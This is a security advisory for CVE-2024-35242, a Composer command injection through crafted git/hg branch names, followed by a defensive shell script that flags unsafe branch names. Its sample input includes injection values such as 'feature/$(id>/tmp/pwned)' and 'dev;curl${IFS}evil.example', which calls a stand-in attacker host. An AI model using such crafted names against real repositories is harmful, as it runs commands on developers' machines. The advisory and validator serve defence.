CVE-2024-35242: Composer has multiple command injections via malicious git/hg branch names
Running `composer install` inside a git or hg checkout whose branch names are specially crafted can lead to command injection: Composer passed branch names to git/hg through a shell without escaping them, so a name containing shell metacharacters (git permits `$`, `;`, `|`, backticks, quotes and parentheses in ref names) is executed as part of the command. Exploitation requires that the victim has cloned an untrusted repository and then runs Composer inside it. Fixed in Composer 2.2.24 and 2.7.7 by the two commits listed below.
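A pre-install check that flags branch names capable of carrying an injection payload, as an added example that is not Composer's own code and not part of the original advisory. It assumes a strict allowlist (alphanumerics plus `.`, `_`, `/`, `-`, not starting with `-`); git's own ref rules are looser and are exactly what the advisory relies on. The sample branch names are constructed for the demonstration.

```shell
#!/bin/sh
# Pre-install check for the CVE-2024-35242 class of bug: flag git/hg branch
# names that would be dangerous if a tool passed them unescaped to a shell.
# Added example, not Composer's code. The allowlist below is an assumption
# that is stricter than what git accepts (git allows $, ;, |, `, quotes, ()).

SAFE_BRANCH_RE='^[A-Za-z0-9][A-Za-z0-9._/-]*$'

# check_branch_name NAME -> exit 0 if NAME is on the allowlist, 1 otherwise.
# Names containing a newline are rejected outright so that a multi-line name
# cannot slip a clean first line past grep.
check_branch_name() {
    [ "$(printf '%s' "$1" | wc -l)" -eq 0 ] || return 1
    printf '%s\n' "$1" | LC_ALL=C grep -Eq "$SAFE_BRANCH_RE"
}

# suspicious_branch_names < list -> prints every offending name, one per line;
# exit status 1 if any were found, 0 if the whole list was clean.
suspicious_branch_names() {
    rc=0
    while IFS= read -r name; do
        [ -n "$name" ] || continue
        if ! check_branch_name "$name"; then
            printf '%s\n' "$name"
            rc=1
        fi
    done
    return $rc
}

# scan_repo_branches [DIR] -> run the check over every local and remote branch
# of a git checkout, i.e. the refs Composer sees when run inside the repo.
scan_repo_branches() {
    dir=${1:-.}
    git -C "$dir" for-each-ref --format='%(refname:short)' refs/heads refs/remotes \
        | suspicious_branch_names
}

# Constructed sample input (not taken from a real repository). The last three
# are valid git branch names yet carry shell metacharacters or a leading dash.
SAMPLE_BRANCHES='main
release/1.2
feature/$(id>/tmp/pwned)
dev;curl${IFS}evil.example
-option-looking'

# Stand-alone run: report the offending names from the constructed sample.
printf '%s\n' "$SAMPLE_BRANCHES" | suspicious_branch_names
```

Run `scan_repo_branches /path/to/clone` before invoking Composer inside a repository you did not author; a non-zero exit means at least one branch name would be a plausible injection vector for any tool that still builds git/hg command lines by string concatenation.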
References
- github.com/advisories/GHSA-v9qv-c7wm-wgmf
- github.com/composer/composer
- github.com/composer/composer/commit/6bd43dff859c597c09bd03a7e7d6443822d0a396
- github.com/composer/composer/commit/fc57b93603d7d90b71ca8ec77b1c8a9171fdb467
- github.com/composer/composer/security/advisories/GHSA-v9qv-c7wm-wgmf
- nvd.nist.gov/vuln/detail/CVE-2024-35242